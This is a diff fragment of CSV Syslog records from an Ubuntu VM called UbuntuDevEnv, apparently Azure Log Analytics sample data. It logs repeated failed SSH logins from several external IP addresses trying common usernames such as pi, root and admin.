+52,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 22:58:26,UbuntuDevEnv,2019-06-27 22:58:25,auth,UbuntuDevEnv,info,Disconnected from user peteb 131.107.159.185 port 11326,4455,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,131.107.159.1,11326,,
+53,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-27 22:58:26,UbuntuDevEnv,2019-06-27 22:58:25,authpriv,UbuntuDevEnv,info,pam_unix(sshd:session): session closed for user peteb,4275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,peteb,,,,
+54,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:20:41,UbuntuDevEnv,2019-06-28 01:20:40,auth,UbuntuDevEnv,info,Invalid user pi from 46.214.254.180 port 42068,40520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,46.214.254.1,42068,,
+55,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:20:41,UbuntuDevEnv,2019-06-28 01:20:40,auth,UbuntuDevEnv,info,Invalid user pi from 46.214.254.180 port 42067,40518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,46.214.254.1,42067,,
+56,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:20:41,UbuntuDevEnv,2019-06-28 01:20:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.214.254.180,40520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.214.254.1,,0,
+57,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:20:41,UbuntuDevEnv,2019-06-28 01:20:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+58,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:20:41,UbuntuDevEnv,2019-06-28 01:20:41,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,40518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+59,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:20:41,UbuntuDevEnv,2019-06-28 01:20:41,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.214.254.180,40518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.214.254.1,,0,
+60,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:20:43,UbuntuDevEnv,2019-06-28 01:20:43,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 46.214.254.180 port 42068 ssh2,40520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,46.214.254.1,42068,,
+61,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:20:43,UbuntuDevEnv,2019-06-28 01:20:43,auth,UbuntuDevEnv,info,Failed password for invalid user pi from 46.214.254.180 port 42067 ssh2,40518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,46.214.254.1,42067,,
+62,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:20:43,UbuntuDevEnv,2019-06-28 01:20:43,auth,UbuntuDevEnv,info,Connection closed by invalid user pi 46.214.254.180 port 42068 [preauth],40520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,46.214.254.1,42068,,invalid
+63,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 01:20:43,UbuntuDevEnv,2019-06-28 01:20:43,auth,UbuntuDevEnv,info,Connection closed by invalid user pi 46.214.254.180 port 42067 [preauth],40518,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pi,46.214.254.1,42067,,invalid
+64,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:09:53,UbuntuDevEnv,2019-06-28 07:09:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56  user=root,124267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,,0,
+65,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:09:55,UbuntuDevEnv,2019-06-28 07:09:55,auth,UbuntuDevEnv,info,Failed password for root from 188.25.166.56 port 45300 ssh2,124267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.25.166.5,45300,,
+66,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:10:11,UbuntuDevEnv,2019-06-28 07:10:11,auth,UbuntuDevEnv,info,Connection closed by authenticating user root 188.25.166.56 port 45300 [preauth],124267,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,45300,,authenticating
+67,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:23:22,UbuntuDevEnv,2019-06-28 07:23:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56  user=root,127189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,,0,
+68,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:23:25,UbuntuDevEnv,2019-06-28 07:23:24,auth,UbuntuDevEnv,info,Failed password for root from 188.25.166.56 port 44332 ssh2,127189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.25.166.5,44332,,
+69,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:23:37,UbuntuDevEnv,2019-06-28 07:23:37,auth,UbuntuDevEnv,info,Connection closed by authenticating user root 188.25.166.56 port 44332 [preauth],127189,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,44332,,authenticating
+70,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:37:23,UbuntuDevEnv,2019-06-28 07:37:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56  user=root,130585,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,,0,
+71,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:37:26,UbuntuDevEnv,2019-06-28 07:37:25,auth,UbuntuDevEnv,info,Failed password for root from 188.25.166.56 port 58564 ssh2,130585,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.25.166.5,58564,,
+72,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:38:32,UbuntuDevEnv,2019-06-28 07:38:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56  user=root,130993,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,,0,
+73,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:38:34,UbuntuDevEnv,2019-06-28 07:38:34,auth,UbuntuDevEnv,info,Failed password for root from 188.25.166.56 port 39044 ssh2,130993,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,188.25.166.5,39044,,
+74,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:39:02,UbuntuDevEnv,2019-06-28 07:39:01,auth,UbuntuDevEnv,info,Connection closed by authenticating user root 188.25.166.56 port 39044 [preauth],130993,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,188.25.166.5,39044,,authenticating
+75,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:50:09,UbuntuDevEnv,2019-06-28 07:50:08,auth,UbuntuDevEnv,info,Invalid user admin from 188.25.166.56 port 33448,2877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,188.25.166.5,33448,,
+76,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:50:57,UbuntuDevEnv,2019-06-28 07:50:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56,2877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,188.25.166.5,,0,
+77,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:50:57,UbuntuDevEnv,2019-06-28 07:50:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,2877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+78,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:50:59,UbuntuDevEnv,2019-06-28 07:50:58,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 188.25.166.56 port 33448 ssh2,2877,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,188.25.166.5,33448,,
+79,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:54:31,UbuntuDevEnv,2019-06-28 07:54:31,auth,UbuntuDevEnv,info,Invalid user admin from 188.25.166.56 port 34890,3857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,188.25.166.5,34890,,
+80,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:54:49,UbuntuDevEnv,2019-06-28 07:54:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+81,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:54:49,UbuntuDevEnv,2019-06-28 07:54:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56,3857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,188.25.166.5,,0,
+82,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:54:51,UbuntuDevEnv,2019-06-28 07:54:51,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 188.25.166.56 port 34890 ssh2,3857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,188.25.166.5,34890,,
+83,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:55:08,UbuntuDevEnv,2019-06-28 07:55:08,auth,UbuntuDevEnv,info,Connection closed by invalid user admin 188.25.166.56 port 34890 [preauth],3857,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,188.25.166.5,34890,,invalid
+84,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:56:52,UbuntuDevEnv,2019-06-28 07:56:51,auth,UbuntuDevEnv,info,Invalid user admin from 188.25.166.56 port 45892,4099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,188.25.166.5,45892,,
+85,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:56:54,UbuntuDevEnv,2019-06-28 07:56:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56,4099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,188.25.166.5,,0,
+86,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:56:54,UbuntuDevEnv,2019-06-28 07:56:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+87,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 07:56:56,UbuntuDevEnv,2019-06-28 07:56:56,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 188.25.166.56 port 45892 ssh2,4099,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,188.25.166.5,45892,,
+88,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:05:46,UbuntuDevEnv,2019-06-28 08:05:46,auth,UbuntuDevEnv,info,Invalid user NetLinx from 188.25.166.56 port 52264,6073,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,NetLinx,188.25.166.5,52264,,
+89,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:06:56,UbuntuDevEnv,2019-06-28 08:06:56,auth,UbuntuDevEnv,info,Invalid user netscreen from 188.25.166.56 port 50260,6647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,netscreen,188.25.166.5,50260,,
+90,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:06:59,UbuntuDevEnv,2019-06-28 08:06:59,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,6647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+91,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:06:59,UbuntuDevEnv,2019-06-28 08:06:59,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56,6647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,188.25.166.5,,0,
+92,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:07:02,UbuntuDevEnv,2019-06-28 08:07:01,auth,UbuntuDevEnv,info,Failed password for invalid user netscreen from 188.25.166.56 port 50260 ssh2,6647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,netscreen,188.25.166.5,50260,,
+93,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:07:06,UbuntuDevEnv,2019-06-28 08:07:05,auth,UbuntuDevEnv,info,Connection closed by invalid user netscreen 188.25.166.56 port 50260 [preauth],6647,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,netscreen,188.25.166.5,50260,,invalid
+94,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:09:40,UbuntuDevEnv,2019-06-28 08:09:39,auth,UbuntuDevEnv,info,Invalid user misp from 188.25.166.56 port 38168,7258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,misp,188.25.166.5,38168,,
+95,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:16:05,UbuntuDevEnv,2019-06-28 08:16:04,auth,UbuntuDevEnv,info,Invalid user openhabian from 188.25.166.56 port 59486,8290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,openhabian,188.25.166.5,59486,,
+96,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:17:03,UbuntuDevEnv,2019-06-28 08:17:03,auth,UbuntuDevEnv,info,Invalid user admin from 188.25.166.56 port 49468,8880,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,188.25.166.5,49468,,
+97,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:23:48,UbuntuDevEnv,2019-06-28 08:23:48,auth,UbuntuDevEnv,info,Invalid user super from 188.25.166.56 port 45726,10255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,188.25.166.5,45726,,
+98,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:23:50,UbuntuDevEnv,2019-06-28 08:23:49,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,10255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+99,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:23:50,UbuntuDevEnv,2019-06-28 08:23:49,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=188.25.166.56,10255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,188.25.166.5,,0,
+100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:23:52,UbuntuDevEnv,2019-06-28 08:23:51,auth,UbuntuDevEnv,info,Failed password for invalid user super from 188.25.166.56 port 45726 ssh2,10255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,188.25.166.5,45726,,
+101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:23:54,UbuntuDevEnv,2019-06-28 08:23:53,auth,UbuntuDevEnv,info,Connection closed by invalid user super 188.25.166.56 port 45726 [preauth],10255,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,super,188.25.166.5,45726,,invalid
+102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:35,UbuntuDevEnv,2019-06-28 08:34:35,auth,UbuntuDevEnv,info,Invalid user admin from 61.83.31.89 port 40960,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,61.83.31.8,40960,,
+103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:35,UbuntuDevEnv,2019-06-28 08:34:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:35,UbuntuDevEnv,2019-06-28 08:34:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=61.83.31.89,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,61.83.31.8,,0,
+105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:38,UbuntuDevEnv,2019-06-28 08:34:37,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 61.83.31.89 port 40960 ssh2,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,61.83.31.8,40960,,
+106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:38,UbuntuDevEnv,2019-06-28 08:34:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:40,UbuntuDevEnv,2019-06-28 08:34:39,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 61.83.31.89 port 40960 ssh2,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,61.83.31.8,40960,,
+108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:40,UbuntuDevEnv,2019-06-28 08:34:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:42,UbuntuDevEnv,2019-06-28 08:34:42,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 61.83.31.89 port 40960 ssh2,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,61.83.31.8,40960,,
+110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:42,UbuntuDevEnv,2019-06-28 08:34:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-28 08:34:45,UbuntuDevEnv,2019-06-28 08:34:45,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 61.83.31.89 port 40960 ssh2,13127,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,61.83.31.8,40960,,
